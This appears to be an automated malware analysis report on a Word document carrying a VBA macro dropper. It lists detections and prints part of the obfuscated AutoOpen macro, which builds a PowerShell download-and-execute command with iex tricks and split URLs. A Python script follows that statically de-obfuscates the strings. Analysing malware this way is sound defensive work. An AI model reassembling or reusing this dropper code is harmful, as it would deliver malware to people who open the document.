Verdict: MALICIOUS (risk score 242)
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 User Execution: Malicious File
The sample is a malicious OLE Word document carrying a VBA macro with an AutoOpen entry point, so the macro runs as soon as the document is opened with macros enabled. The recovered source shows AutoOpen calling Application.Run with the result of a helper function (cwNlbCl) as an argument; the named target macro is not in the visible portion of the source. The helper builds strings with Mid() over junk-padded literals under On Error Resume Next, and those literals contain PowerShell obfuscation tokens: -RePlaCe operands that map short delimiters to [Char] codes for $, the single quote and |, plus the $PSHome[21]+$PSHome[34]+'x' and $VerbosePreference.ToString()[1,3]+'X' index tricks, both of which resolve to iex on a default Windows install. Together with the Shell() call flagged by the heuristics, this indicates the macro assembles and executes a PowerShell command, most likely to download and run a second-stage payload. The ClamAV signature (Doc.Dropper.Agent-6447065-0) and the heuristic hits establish malicious intent, but the specific malware family could not be determined from this report.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6447065-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6447065-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code.
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (For this sample a VBA project was in fact recovered, see the extracted macros.bas below, so this marker adds little beyond the AutoOpen finding.)
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ersmgY+l (in document text, OLE body). This is not a usable URL: the extractor stopped at the first quote of the macro's obfuscated literal http://ersmgY+l'+'5M+l5M..., so the real host can only be recovered by de-obfuscating the string.
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace URI found in ordinary Office documents and is not an indicator on its own.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 24437 bytes | 68d752feeb19971618b01df619a13baecf5a60c197495cc39c1be8bd08fd56ea |
Preview script (first 1,000 lines of the extracted script; the listing below is cut off where the report truncates it)

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NTiRlViMWCoM"
Sub AutoOpen()
On Error Resume Next
kKUjAqItU = tPIWAd - Sgn(LsrrmXNlSb) - (31585 - Tan(8884268) / 9985737 - ChrW(FRuUhKcuupL))
zACdWuPvE = HfiwnGzhOIz - Sgn(iowNBSS) - (538630 - Tan(3381980) / 9706127 - ChrW(fmW))
LIwhkwvzz = MVuEfMfhMiV - Sgn(fIswdB) - (3788362 - Tan(1754384) / 5609281 - ChrW(LQu))
Application.Run "rPWABqzMqXKuA", cwNlbCl
plhXAZirM = jYN - Sgn(FSUTHAzc) - (7701132 - Tan(7784128) / 7607144 - ChrW(ufoJKJd))
KpawKLFrW = HMYPdOq - Sgn(jEPwM) - (9485002 - Tan(8659811) / 6930665 - ChrW(izCCqWvDii))
UKHCJaJjb = FQRzAa - Sgn(NNcd) - (1002311 - Tan(4998061) / 6132210 - ChrW(sTQRqcLvj))
End Sub
Function cwNlbCl()
On Error Resume Next
oXZDbSiNo = hunN - Sgn(hTXMCR) - (4026657 - Tan(5037899) / 3145667 - ChrW(KOwCBuSDMwihK))
stdirLokicU = REYSLnHcbjWw - Sgn(urfDLjuz) - (1805094 - Tan(9477216) / 6612726 - ChrW(OPraQfA))
BioPFzh = jvwtC - Sgn(ckimPf) - (526565 - Tan(3982413) / 4574990 - ChrW(htWzQ))
wBToawY = VThzwowI + Mid(TVCPpuESwHuz + "QnSEFAYKtTATRTcYHVHNmsccr]39-CrepLacE ([cHar]112+[cHar]119+[cHar]68),[cHar]124)sdP .( 50lP'+'SHoMe[21]+50lPSHOMe[34]+l5Mxl5M)') -RePlaCe '50l',[Char]36 -crePLAcE 'l5M',[Char]39 -RePlaCkhobwrDjvDWO" + lAmKXtkV, 25, 161)
ZlnZTmOBi = OINfYSusa - Sgn(HWkZmhCjlIms) - (3719639 - Tan(9493824) / 8698999 - ChrW(CjwdD))
wNGrjXAqpn = kvTuDOSNwfiN - Sgn(ZCRQXPXjYoV) - (7990924 - Tan(3006449) / 7303921 - ChrW(PLvwmS))
KCnCjJ = pFsdoOYKHKG - Sgn(TIlSZ) - (2679283 - Tan(6122072) / 1136293 - ChrW(GwEoc))
hpXnEsh = HHpwwYQBKBWpp + Mid(tmAwHJRWhDQtrf + "pTmgYch(tL8asfc in mgY+mgYtLmg'+'Y+mgY8AngS+ngSDC'+'X){try{tL8YYU.ls2mgYngS+ngS+mgYDo0qIWnmgY+mgYl0qmgY+mgYngSl5M'+'+l5M+ngSImgY+mg'+'YOal5M+'+'l5MmgY+mgYdF'+'ImgY+mgY0mgY+mgYqIlmgY+mguApUbZktQGHTHWioadRw" + XIDswnqDESEUj, 3, 182)
iPDKRpGDojl = FdsWiHM - Sgn(jHopLJaXX) - (4723081 - Tan(6167219) / 8842769 - ChrW(vavfmWvzYn))
VsZvF = lKzUtND - Sgn(FMcEjEP) - (9963271 - Tan(7061845) / 8155980 - ChrW(mDJlJ))
AHlNSJ = zqw - Sgn(RdLTSEBJFdJ) - (4130811 - Tan(2495862) / 7717928 - ChrW(SWMaWWK))
aQAXt = zmklaSn + Mid(LXtbJ + "BiAKe 'sdP',[Char]124) ) GPLiCUUkifjLFioCFwoLKDoIWFUDEPuO" + OhLjD, 5, 21)
cqcKqjCf = RqjkQZN - Sgn(VzTA) - (5412223 - Tan(5622743) / 3784049 - ChrW(jnOizlBmwaIj))
TciVU = uMjbGGzlMG - Sgn(VhNTQPYkWr) - (6124114 - Tan(2693347) / 476919 - ChrW(Vjouo))
fokTwwi = QjcbljZVWUCU - Sgn(jISXiVjBYK) - (7619555 - Tan(2830749) / 9732386 - ChrW(PlaKrXQRoE))
IzXkPbqJ = NASbYqRw + Mid(GiojRkQA + "wwlhKBCl5MmgY+'+'mg'+'YtmgY+mgY.megaxl5M+l'+'5MusmgY+mgY.mgY+mgYcom/v1/images/amgY+mgYrmgY+mgYticmgY+mgYlel5M+l5Mml5M+l5MgY+mgY/mgY+mgYIpjKmgY+mgYJT/?http:l5M+l5MmgY+mgY//wngS+ngSww.umbriawi'OYopAFVOmaKIPOhtKMpcwhMU" + qfMBRq, 8, 184)
QkvjtMdKqaO = zPPUO - Sgn(AnqwJIwDRLM) - (6761009 - Tan(3375048) / 703961 - ChrW(PdZSQZv))
jJjvLkS = jTSsdNRFio - Sgn(GlQoiNpI) - (4133101 - Tan(8154037) / 9378036 - ChrW(iGt))
zTrlqjjGG = mqBzLEIKfr - Sgn(UqzFdu) - (8856470 - Tan(9409453) / 6340828 - ChrW(oqEaQZpjSomkfi))
FHYtjq = ihpDOCpKhVDC + Mid(GYHns + "mZXLnOcMzLUTh & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjphiqiobPUjOBKUXOitAitCG" + oMmCJjvJ, 14, 167)
jGbSnABS = iTaNDdkKUqzEi - Sgn(EsizGFwEEQMDd) - (4646236 - Tan(9314408) / 6188981 - ChrW(jTRXJf))
nZdjuF = nUkHBuVBCOIqTz - Sgn(SwaOJAzAMOoa) - (2580604 - Tan(7101489) / 3281582 - ChrW(uMiMmUqC))
UGZzOF = vLBOQ - Sgn(MPsB) - (4032572 - Tan(9432828) / 8943455 - ChrW(voTYtMTI))
KfWDYJcHFP = jqLCcGJqw + Mid(SVkSFkJ + "rF+'f'+'i.it/Ue8J/?http://ersmgY+l'+'5M+l5MmgYte.vipl5M+l5Mmgl5M+l5MY+mgY/nH0tmgY+mgYN/EnQJDAiqprHd" + jwzzX, 3, 87)
uZWrDNDzDt = mXSwzpqmuQXC - Sgn(bcoDPZpHG) - (8156424 - Tan(6501178) / 5387682 - ChrW(kInjoRNmwPm))
WbJQMKtTam = HiN - S
```
... (truncated)
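To make the string building in the preview concrete, here is an added example that is not the analyzer's code and not part of the sample: it statically emulates the Mid() statements above, learns the delimiter map from the script's own -replace operands, and applies one de-obfuscation layer. It assumes that the undeclared variables around each literal are Empty (VBA concatenates Empty as an empty string, and On Error Resume Next hides any complaint), that PowerShell evaluates 'a'+'b' joins before -replace, and that the sample input below is just the six Mid() lines copied from the preview. The remaining tokens (mgY, ngS, tL8, Eny) are delimiters of a further layer whose map is not in the visible portion of the macro, so the output is only partly readable. Nothing is executed.

```python
"""Static emulation of the Mid()-split / -replace obfuscation in the macro preview.

Added example, not the analyzer's or the sample's code. Pure text processing.
"""
import re

# Constructed input: the Mid() statements copied from the macros.bas preview.
# The surrounding Sgn()/Tan()/ChrW() arithmetic never feeds the strings.
VBA_SAMPLE = r'''
wBToawY = VThzwowI + Mid(TVCPpuESwHuz + "QnSEFAYKtTATRTcYHVHNmsccr]39-CrepLacE ([cHar]112+[cHar]119+[cHar]68),[cHar]124)sdP .( 50lP'+'SHoMe[21]+50lPSHOMe[34]+l5Mxl5M)') -RePlaCe '50l',[Char]36 -crePLAcE 'l5M',[Char]39 -RePlaCkhobwrDjvDWO" + lAmKXtkV, 25, 161)
hpXnEsh = HHpwwYQBKBWpp + Mid(tmAwHJRWhDQtrf + "pTmgYch(tL8asfc in mgY+mgYtLmg'+'Y+mgY8AngS+ngSDC'+'X){try{tL8YYU.ls2mgYngS+ngS+mgYDo0qIWnmgY+mgYl0qmgY+mgYngSl5M'+'+l5M+ngSImgY+mg'+'YOal5M+'+'l5MmgY+mgYdF'+'ImgY+mgY0mgY+mgYqIlmgY+mguApUbZktQGHTHWioadRw" + XIDswnqDESEUj, 3, 182)
aQAXt = zmklaSn + Mid(LXtbJ + "BiAKe 'sdP',[Char]124) ) GPLiCUUkifjLFioCFwoLKDoIWFUDEPuO" + OhLjD, 5, 21)
IzXkPbqJ = NASbYqRw + Mid(GiojRkQA + "wwlhKBCl5MmgY+'+'mg'+'YtmgY+mgY.megaxl5M+l'+'5MusmgY+mgY.mgY+mgYcom/v1/images/amgY+mgYrmgY+mgYticmgY+mgYlel5M+l5Mml5M+l5MgY+mgY/mgY+mgYIpjKmgY+mgYJT/?http:l5M+l5MmgY+mgY//wngS+ngSww.umbriawi'OYopAFVOmaKIPOhtKMpcwhMU" + qfMBRq, 8, 184)
FHYtjq = ihpDOCpKhVDC + Mid(GYHns + "mZXLnOcMzLUTh & ( $verbosEPrefErEnCe.tOsTRinG()[1,3]+'X'-jOIN'')((('((l5M (ngS((mngS+ngSgY'+'tL8nsadasd = &(EmgY+mgYnmgY+mgYynEny+EmgY'+'+mgY'+'nyeEny+l5M+l5MEl5M+l5Mnyw-obmgY+mgYjphiqiobPUjOBKUXOitAitCG" + oMmCJjvJ, 14, 167)
KfWDYJcHFP = jqLCcGJqw + Mid(SVkSFkJ + "rF+'f'+'i.it/Ue8J/?http://ersmgY+l'+'5M+l5MmgYte.vipl5M+l5Mmgl5M+l5MY+mgY/nH0tmgY+mgYN/EnQJDAiqprHd" + jwzzX, 3, 87)
'''

# target = <Empty var> + Mid(<Empty var> + "literal" + <Empty var>, start, length)
MID_RE = re.compile(
    r'^\s*(?P<var>\w+)\s*=\s*\w+\s*\+\s*Mid\(\w+\s*\+\s*"(?P<lit>[^"]*)"\s*\+\s*\w+\s*,'
    r'\s*(?P<start>\d+)\s*,\s*(?P<len>\d+)\s*\)', re.M)

# PowerShell string-literal split: 'abc'+'def' -> 'abcdef'
PS_JOIN = re.compile(r"'\+'")

# Both spell "iex" on a default install: $PSHome is
# C:\Windows\System32\WindowsPowerShell\v1.0 (index 21 = 'i', 34 = 'e') and
# $VerbosePreference is SilentlyContinue (index 1 = 'i', 3 = 'e').
IEX_TRICKS = {
    'iex via $PSHome indices': re.compile(r"\$pshome\[21\]\+\$pshome\[34\]\+'x'", re.I),
    'iex via $VerbosePreference': re.compile(r"verbosepreference\.tostring\(\)\[1,3\]\+'x'", re.I),
}


def vba_mid(s: str, start: int, length: int) -> str:
    """VBA Mid(): 1-based start. The undeclared operands are Empty and add nothing."""
    return s[start - 1:start - 1 + length]


def recover_chunks(vba_source: str) -> dict:
    """Map each assigned variable to the substring its Mid() call yields."""
    return {m['var']: vba_mid(m['lit'], int(m['start']), int(m['len']))
            for m in MID_RE.finditer(vba_source)}


def learn_replace_map(chunks) -> dict:
    """Read the delimiter -> character map out of the script's own
    `-replace '<tok>',[Char]<n>` operands (the keyword itself may be split
    across two chunks, so only the operand pair is matched)."""
    joined = ' '.join(chunks)
    return {tok: chr(int(code))
            for tok, code in re.findall(r"'(\w{3})',\s*\[char\](\d+)", joined, re.I)}


def peel(text: str, replace_map: dict) -> str:
    """One layer: join split literals first (PowerShell concatenates before
    -replace runs), then substitute the delimiters."""
    text = PS_JOIN.sub('', text)
    for tok, ch in replace_map.items():
        text = text.replace(tok, ch)
    return text


def analyze(vba_source: str) -> dict:
    chunks = recover_chunks(vba_source)
    rmap = learn_replace_map(chunks.values())
    decoded = {var: peel(chunk, rmap) for var, chunk in chunks.items()}
    hits = sorted(name for name, rx in IEX_TRICKS.items()
                  if any(rx.search(d) for d in decoded.values()))
    return {'chunks': chunks, 'replace_map': rmap, 'decoded': decoded, 'iex_tricks': hits}


if __name__ == '__main__':
    result = analyze(VBA_SAMPLE)
    print('delimiter map:', result['replace_map'])
    print('iex tricks   :', result['iex_tricks'])
    for var, text in result['decoded'].items():
        print(f'{var}: {text}')
```

After the first layer the wBToawY chunk reads `| .( $PSHoMe[21]+$PSHOMe[34]+'x')`, which is the pipe into iex that the -replace operands were hiding, and the KfWDYJcHFP chunk shows why the report's extracted URL stops at http://ersmgY+l: the rest of the host is split by the mgY delimiter of the next layer. The same approach extends to that layer once the full macro (beyond the truncated preview) supplies its replace operands.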